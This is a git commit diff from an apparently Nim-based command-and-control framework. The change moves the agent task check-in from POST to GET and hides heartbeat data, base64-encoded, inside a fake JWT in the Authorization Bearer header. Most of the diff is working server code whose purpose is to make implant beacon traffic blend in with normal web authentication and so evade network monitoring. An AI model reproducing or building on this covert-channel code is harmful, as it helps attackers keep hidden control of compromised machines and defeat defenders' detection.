Updated C2 communication to hide heartbeat data in JWT token.

2025-08-13 13:38:39 +02:00
parent 0e205d34d3
commit b7622dd72f
6 changed files with 27 additions and 27 deletions
--- a/src/server/api/routes.nim
+++ b/src/server/api/routes.nim
@@ -31,20 +31,22 @@ proc register*(ctx: Context) {.async.} =
        resp "", Http404

 #[
-    POST /tasks
+    GET /tasks
    Called from agent to check for new tasks
 ]#
 proc getTasks*(ctx: Context) {.async.} = 

    # Check headers
-    # If POST data is not binary data, return 404 error code
-    if ctx.request.contentType != "application/octet-stream": 
-        resp "", Http404
-        return  
+    # Heartbeat data is hidden base64-encoded within "Authorization: Bearer" header, between a prefix and suffix 
+    if not ctx.request.hasHeader("Authorization"): 
+        resp "", Http404 
+        return 
+
+    let checkinData: seq[byte] = decode(ctx.request.getHeader("Authorization")[0].split(".")[1]).toBytes()

    try: 
        var response: seq[byte]
-        let tasks: seq[seq[byte]] = getTasks(ctx.request.body.toBytes())
+        let tasks: seq[seq[byte]] = getTasks(checkinData)

        if tasks.len <= 0: 
            resp "", Http200
--- a/src/server/core/listener.nim
+++ b/src/server/core/listener.nim
@@ -67,7 +67,7 @@ proc listenerStart*(cq: Conquest, host: string, portStr: string) =

    # Define API endpoints
    listener.post("register", routes.register)
-    listener.post("tasks", routes.getTasks)
+    listener.get("tasks", routes.getTasks)
    listener.post("results", routes.postResults)
    listener.registerErrorHandler(Http404, routes.error404)

@@ -80,7 +80,7 @@ proc listenerStart*(cq: Conquest, host: string, portStr: string) =
    try:
        discard listener.runAsync() 
        cq.add(listenerInstance)
-        cq.writeLine(fgGreen, "[+] ", resetStyle, "Started listener", fgGreen, fmt" {name} ", resetStyle, fmt"on port {portStr}.")
+        cq.writeLine(fgGreen, "[+] ", resetStyle, "Started listener", fgGreen, fmt" {name} ", resetStyle, fmt"on {host}:{portStr}.")
    except CatchableError as err: 
        cq.writeLine(fgRed, styleBright, "[-] Failed to start listener: ", err.msg)

@@ -100,14 +100,14 @@ proc restartListeners*(cq: Conquest) =

        # Define API endpoints
        listener.post("register", routes.register)
-        listener.post("tasks", routes.getTasks)
+        listener.get("tasks", routes.getTasks)
        listener.post("results", routes.postResults)
        listener.registerErrorHandler(Http404, routes.error404)
        
        try:
            discard listener.runAsync() 
            cq.add(l)
-            cq.writeLine(fgGreen, "[+] ", resetStyle, "Restarted listener", fgGreen, fmt" {l.listenerId} ", resetStyle, fmt"on port {$l.port}.")
+            cq.writeLine(fgGreen, "[+] ", resetStyle, "Restarted listener", fgGreen, fmt" {l.listenerId} ", resetStyle, fmt"on {l.address}:{$l.port}.")
        except CatchableError as err: 
            cq.writeLine(fgRed, styleBright, "[-] Failed to restart listener: ", err.msg)